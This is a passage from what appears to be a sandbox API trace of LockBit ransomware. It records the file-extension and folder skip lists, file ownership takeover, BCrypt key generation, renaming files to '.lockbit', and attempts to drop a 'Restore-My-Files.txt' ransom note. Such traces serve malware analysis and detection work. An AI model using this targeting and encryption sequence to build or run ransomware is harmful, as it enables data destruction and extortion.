returned 1 [0092.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.334] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.334] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.335] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.335] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.335] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0092.335] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0092.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0092.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0092.335] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0092.335] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0092.335] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0092.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png") returned=".png" [0092.335] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.335] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.335] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.336] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.336] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.337] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.lockbit") returned 98 [0092.337] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.338] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.341] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.341] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.342] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.343] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.344] RtlFreeAnsiString (AnsiString="\\") [0092.344] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0092.344] malloc (_Size=0x200) returned 0x77d800 [0092.344] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.344] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.344] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.344] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.345] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.345] CloseHandle (hObject=0x13d8) returned 1 [0092.345] free (_Block=0x77d800) [0092.345] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0092.346] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.346] malloc (_Size=0x40068) returned 0x3df0008 [0092.346] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3081) returned 1 [0092.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0092.349] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0092.353] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0092.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.362] malloc (_Size=0xda) returned 0x77d800 [0092.362] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xda, FileInformationClass=0xa) returned 0x0 [0092.363] free (_Block=0x77d800) [0092.363] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.363] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.363] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.363] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="photograph.png", cAlternateFileName="")) returned 1 [0092.364] lstrcmpiW (lpString1=".", lpString2="photograph.png") returned -1 [0092.364] lstrcmpiW (lpString1="..", lpString2="photograph.png") returned -1 [0092.364] PathFindExtensionW (pszPath="photograph.png") returned=".png" [0092.364] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.364] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.364] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.365] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.365] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.366] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.366] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="photograph.png") returned 1 [0092.366] lstrcmpiW (lpString1="ntldr", lpString2="photograph.png") returned -1 [0092.366] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="photograph.png") returned -1 [0092.366] lstrcmpiW (lpString1="bootsect.bak", lpString2="photograph.png") returned -1 [0092.366] lstrcmpiW (lpString1="autorun.inf", lpString2="photograph.png") returned -1 [0092.366] lstrcmpiW (lpString1="thumbs.db", lpString2="photograph.png") returned 1 [0092.366] lstrcmpiW (lpString1="iconcache.db", lpString2="photograph.png") returned -1 [0092.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\") returned="" [0092.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png") returned=".png" [0092.366] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.366] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.366] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.366] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.367] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.367] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.367] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.lockbit") returned 76 [0092.368] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.369] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.371] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.371] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.372] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.373] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.373] RtlFreeAnsiString (AnsiString="\\") [0092.373] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0092.373] malloc (_Size=0x200) returned 0x77d800 [0092.373] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.373] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.373] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.373] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.374] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.375] CloseHandle (hObject=0x1194) returned 1 [0092.375] free (_Block=0x77d800) [0092.375] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0092.375] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.375] malloc (_Size=0x40068) returned 0x3d70048 [0092.377] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=24791) returned 1 [0092.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0092.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.382] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0092.382] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.392] malloc (_Size=0xae) returned 0x77d800 [0092.392] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0092.393] free (_Block=0x77d800) [0092.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 1 [0092.393] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt") returned 74 [0092.393] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.393] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="photograph.png", cAlternateFileName="")) returned 0 [0092.393] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0092.393] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Travel", cAlternateFileName="")) returned 1 [0092.393] lstrcmpiW (lpString1=".", lpString2="Travel") returned -1 [0092.393] lstrcmpiW (lpString1="..", lpString2="Travel") returned -1 [0092.393] lstrcmpiW (lpString1="Travel", lpString2="$windows.~bt") returned 1 [0092.393] lstrcmpiW (lpString1="Travel", lpString2="intel") returned 1 [0092.393] lstrcmpiW (lpString1="Travel", lpString2="msocache") returned 1 [0092.393] lstrcmpiW (lpString1="Travel", lpString2="$recycle.bin") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="$windows.~ws") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="tor browser") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="boot") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="system volume information") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="perflogs") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="google") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="application data") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="windows") returned -1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="windows.old") returned -1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="appdata") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Windows nt") returned -1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Msbuild") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Microsoft") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="All users") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="mozilla") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Microsoft.NET") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="microsoft shared") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Internet Explorer") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="common files") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="opera") returned 1 [0092.394] lstrcmpiW (lpString1="Travel", lpString2="Windows Journal") returned -1 [0092.394] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 51 [0092.395] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*") returned 53 [0092.395] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0092.405] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.405] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, 